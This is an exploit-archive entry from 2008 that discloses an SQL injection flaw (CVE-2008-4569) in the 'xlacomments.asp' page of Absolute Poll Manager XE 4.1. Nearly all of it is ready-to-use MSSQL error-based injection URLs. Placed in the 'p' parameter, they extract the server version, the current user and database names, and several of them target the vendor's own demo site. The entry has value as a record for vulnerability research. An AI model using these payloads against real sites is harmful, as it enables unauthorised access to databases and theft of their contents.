Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection



EKU-ID: 14607 CVE: OSVDB-49150;CVE-2008-4569 OSVDB-ID:
Author: Hakxer Published: 2008-10-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE  [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002
# TM : EgY Coders
#################################################################################################

### POC
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit :

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------

# milw0rm.com [2008-10-11]